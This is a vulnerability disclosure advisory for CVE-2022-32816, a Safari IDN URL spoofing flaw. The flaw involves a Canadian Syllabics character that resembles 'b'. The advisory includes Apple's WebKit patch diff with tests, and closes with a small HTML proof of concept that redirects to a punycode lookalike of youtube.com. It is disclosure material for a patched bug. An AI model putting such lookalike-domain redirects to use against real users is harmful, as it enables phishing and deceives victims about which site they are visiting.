SSD Advisory – Apple Safari IDN URL Spoofing

TL;DR

Bad handling by Apple Safari allows attackers to use certain look-alike characters instead of the real ones to confuse victims into thinking they are reach a certain site, while they are accessing another one.

Vulnerability Summary

A vulnerability in Apple Safari IDN handling allows attackers to perform a URL Spoofing as Safari does not convert inappropriate Unicode from URL Bar to Punycode.

Exploitation of this vulnerability could allow an attacker to use it for phishing.

Credit

The security researcher, Dohyun Lee from SSD Labs (Korea), has reported this to the SSD Secure Disclosure program.

Affected Versions

  • iOS 15.6 or iPadOS 15.6 before
  • Monterey 12.5 before
  • watchOS 8.7 before
  • tvOS 15.6 before

CVE

CVE-2022-32816

Vendor Response

iOS 15.6 and iPadOS 15.6 addresses this issue. Information about the security content is available at: https://support.apple.com/HT213346.

Vulnerability Analysis

Apple Safari has a vulnerability that causes it to not convert the 0x15AF character in Canadian Syllabics to Punycode in the URL Bar, this allows attackers to perform an IDN URL Spoofing, the character in question looks similar to the lowercase English letter b.

There is no root cause (code line) for this vulnerability, as a solution Apple has applied a patch that converts this Unicode to Punycode when it is entered into the URL Bar.

Here is Apple’s patchcode for this vulnerability:

Subversion Revision: 292721
diff --git a/Source/WTF/ChangeLog b/Source/WTF/ChangeLog
index 6ed39d8235a1d336dbfa47cb8a2af2b2402345aa..3fb74a59b1c0d4ad5d32d27898f4b5578e10c2ad 100644
--- a/Source/WTF/ChangeLog
+++ b/Source/WTF/ChangeLog
@@ -1,3 +1,15 @@
+2022-04-13  Alex Christensen  <achristensen@webkit.org>
+
+        Punycode encode U+15AF when not in context of other Canadian aboriginal code points
+        https://bugs.webkit.org/show_bug.cgi?id=239316
+        <rdar://91248059>
+
+        Reviewed by NOBODY (OOPS!).
+
+        * wtf/URLHelpers.cpp:
+        (WTF::URLHelpers::isLookalikeCharacterOfScriptType<USCRIPT_CANADIAN_ABORIGINAL>):
+        (WTF::URLHelpers::isLookalikeCharacter):
+
 2022-04-11  Yusuke Suzuki  <ysuzuki@apple.com>

         [JSC] Reduce use of unnecessary cryptographicallyRandom numbers
diff --git a/Source/WTF/wtf/URLHelpers.cpp b/Source/WTF/wtf/URLHelpers.cpp
index 17865fa784a885411967943cb93b1d7b0153410b..de58cd28c4627c9267c9da9a4b0b2483da5d0f7f 100644
--- a/Source/WTF/wtf/URLHelpers.cpp
+++ b/Source/WTF/wtf/URLHelpers.cpp
@@ -92,6 +92,16 @@ template<> bool isLookalikeCharacterOfScriptType<USCRIPT_TAMIL>(UChar32 codePoin
     }
 }

+template<> bool isLookalikeCharacterOfScriptType<USCRIPT_CANADIAN_ABORIGINAL>(UChar32 codePoint)
+{
+    switch (codePoint) {
+    case 0x15AF: /* CANADIAN SYLLABICS AIVILIK B */
+        return true;
+    default:
+        return false;
+    }
+}
+
 template <UScriptCode ScriptType>
 bool isOfScriptType(UChar32 codePoint)
 {
@@ -287,7 +297,8 @@ static bool isLookalikeCharacter(const std::optional<UChar32>& previousCodePoint
         return false;
     default:
         return isLookalikeSequence<USCRIPT_ARMENIAN>(previousCodePoint, codePoint)
-            || isLookalikeSequence<USCRIPT_TAMIL>(previousCodePoint, codePoint);
+            || isLookalikeSequence<USCRIPT_TAMIL>(previousCodePoint, codePoint)
+            || isLookalikeSequence<USCRIPT_CANADIAN_ABORIGINAL>(previousCodePoint, codePoint);
     }
 }

diff --git a/Tools/ChangeLog b/Tools/ChangeLog
index 6c1a303a45f4abfb2e695a138bc77ce8693eae3e..d3c4fbea7858130304db780ad2a952fdc1c036d5 100644
--- a/Tools/ChangeLog
+++ b/Tools/ChangeLog
@@ -1,3 +1,14 @@
+2022-04-13  Alex Christensen  <achristensen@webkit.org>
+
+        Punycode encode U+15AF when not in context of other Canadian aboriginal code points
+        https://bugs.webkit.org/show_bug.cgi?id=239316
+        <rdar://91248059>
+
+        Reviewed by NOBODY (OOPS!).
+
+        * TestWebKitAPI/Tests/WTF/cocoa/URLExtras.mm:
+        (TestWebKitAPI::TEST):
+
 2022-04-11  Sihui Liu  <sihui_liu@apple.com>

         Fix size computation in WebCore::StorageMap
diff --git a/Tools/TestWebKitAPI/Tests/WTF/cocoa/URLExtras.mm b/Tools/TestWebKitAPI/Tests/WTF/cocoa/URLExtras.mm
index 00fb2dc4b78eed7c9fd1da83e67da2b1edea17df..5ac5668db5a186573b4ec23dbd943121d4a1f844 100644
--- a/Tools/TestWebKitAPI/Tests/WTF/cocoa/URLExtras.mm
+++ b/Tools/TestWebKitAPI/Tests/WTF/cocoa/URLExtras.mm
@@ -126,6 +126,8 @@ TEST(WTF_URLExtras, URLExtras_Spoof)
         "xn--g-idc"_s, // 'g' U+0581
         "xn--o-00e"_s, // U+0BE6 'o'
         "xn--o-10e"_s, // 'o' U+0BE6
+        "xn--a-53i"_s, // U+15AF 'a'
+        "xn--a-63i"_s, // 'a' U+15AF
     };
     for (auto& host : punycodedSpoofHosts) {
         auto url = makeString("http://", host, "/").utf8();
@@ -152,6 +154,9 @@ TEST(WTF_URLExtras, URLExtras_NotSpoofed)

     // Tamil
     EXPECT_STREQ("https://\u0BE6\u0BE7\u0BE8\u0BE9count/", userVisibleString(literalURL("https://\u0BE6\u0BE7\u0BE8\u0BE9count/")));
+
+    // Canadian aboriginal
+    EXPECT_STREQ("https://\u15AF\u1401abc/", userVisibleString(literalURL("https://\u15AF\u1401abc/")));
 }

 TEST(WTF_URLExtras, URLExtras_DivisionSign)

Proof of Concept

<html>
<head>
  <title>Apple Safari IDN URL Spoofing Proof of Concept - SSD Labs</title>
</head>
<body>
  <button onclick="trigger()">Trigger!</button>

  <script>
    function trigger() {
      window.location = "http://xn--youtue-084a.com/";
    }
  </script>
</body>
</html>

Demo

Leave a Reply

Your email address will not be published.